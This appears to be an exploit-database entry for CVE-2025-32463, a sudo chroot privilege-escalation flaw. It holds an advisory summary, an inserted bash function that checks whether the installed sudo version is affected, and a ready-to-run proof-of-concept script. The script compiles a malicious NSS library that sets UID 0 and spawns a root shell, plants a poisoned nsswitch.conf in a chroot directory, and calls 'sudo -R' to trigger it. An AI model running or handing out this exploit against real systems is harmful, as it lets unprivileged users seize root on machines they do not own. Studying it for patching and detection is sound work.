Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
Google Dork: not applicable
Date: Mon, 30 Jun 2025
Exploit Author: Stratascale
Vendor Homepage: https://salsa.debian.org/sudo-team/sudo
Software Link:
Version: Sudo versions 1.9.14 to 1.9.17 inclusive
Tested on: Kali Rolling 2025-7-3
CVE: CVE-2025-32463
*Version running today in Kali:*
https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/
*Background*
An attacker can leverage sudo's -R (--chroot) option to run
arbitrary commands as root, even if they are not listed in the
sudoers file.
Sudo versions affected:
Sudo versions 1.9.14 to 1.9.17 inclusive are affected.
CVE ID:
This vulnerability has been assigned CVE-2025-32463 in the
Common Vulnerabilities and Exposures database.
Details:
Sudo's -R (--chroot) option is intended to allow the user to
run a command with a user-selected root directory if the sudoers
file allows it. A change was made in sudo 1.9.14 to resolve
paths via chroot() using the user-specified root directory while
the sudoers file was still being evaluated. It is possible for
an attacker to trick sudo into loading an arbitrary shared
library by creating an /etc/nsswitch.conf file under the
user-specified root directory.
The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
and the chroot feature has been marked as deprecated. It will
be removed entirely in a future sudo release. Because of the
way sudo resolves commands, supporting a user-specified chroot
directory is error-prone and this feature does not appear to
be widely used.
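As an added audit helper (not part of the advisory or the PoC), the following shell function classifies a "sudo --version" banner against the affected range stated above, treating the optional pN suffix as a patch level so that a build such as 1.9.16p2 is flagged while 1.9.17p1 and later are reported as fixed; check_local_sudo runs it against the host's own sudo.

```shell
#!/bin/bash
# Added audit helper (not part of the advisory or the PoC): classify a
# "sudo --version" banner against the CVE-2025-32463 affected range,
# 1.9.14 through 1.9.17, where 1.9.17p1 is the first fixed release.
# Prints "vulnerable" / "not-vulnerable" / "unparsed"; exit status 0 only
# when the version is inside the affected range.

sudo_chroot_vulnerable() {
    local banner="$1" ver major minor rest patch plevel
    # Extract e.g. "1.9.16p2" from "Sudo version 1.9.16p2"; later banner
    # lines (policy plugin, I/O plugin) do not start with "Sudo version ".
    ver=$(printf '%s\n' "$banner" \
          | sed -n 's/^Sudo version \([0-9][0-9.]*p\{0,1\}[0-9]*\).*/\1/p' \
          | head -n1)
    if [ -z "$ver" ]; then
        echo "unparsed"
        return 2
    fi
    major=${ver%%.*}              # "1"
    rest=${ver#*.}                # "9.16p2"
    minor=${rest%%.*}             # "9"
    case "$rest" in
        *.*) patch=${rest#*.}; patch=${patch%%p*} ;;   # "16"
        *)   patch=0 ;;
    esac
    plevel=0                      # a missing pN suffix counts as p0
    case "$ver" in
        *p*) plevel=${ver#*p} ;;  # "2"
    esac
    # Affected: 1.9.14 <= version <= 1.9.17, except 1.9.17p1 and later.
    if [ "$major" -eq 1 ] && [ "$minor" -eq 9 ] \
       && [ "$patch" -ge 14 ] && [ "$patch" -le 17 ] \
       && ! { [ "$patch" -eq 17 ] && [ "$plevel" -ge 1 ]; }; then
        echo "vulnerable"
        return 0
    fi
    echo "not-vulnerable"
    return 1
}

# Check the sudo binary installed on this host (no root privileges needed).
check_local_sudo() {
    sudo_chroot_vulnerable "$(sudo --version 2>/dev/null)"
}
```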
A more detailed description of the bug and its effects can be
found in the Stratascale advisory:
https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Impact:
On systems that support /etc/nsswitch.conf a user may be able
to run arbitrary commands as root.
*Exploit:*
*Verify the sudo version running: sudo --version. If it is vulnerable, copy and
paste the following code and run it.*
*----------------------*
#!/bin/bash
# sudo-chwoot.sh – PoC CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
# 1. NSS library
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
    setreuid(0,0); /* change to UID 0 */
    setregid(0,0); /* change to GID 0 */
    chdir("/"); /* exit from chroot */
    execl("/bin/bash","/bin/bash",NULL); /* root shell */
}
EOF
# 2. Mini chroot with toxic nsswitch.conf
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc # make getgrnam() not fail
# 3. compile libnss_
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "[*] Running exploit…"
sudo -R woot woot # (-R <dir> <cmd>)
# • the first "woot" is the chroot directory
# • the second "woot" is a nonexistent command
#   (sudo only needs to resolve the user)
rm -rf "$STAGE"
*----------------------*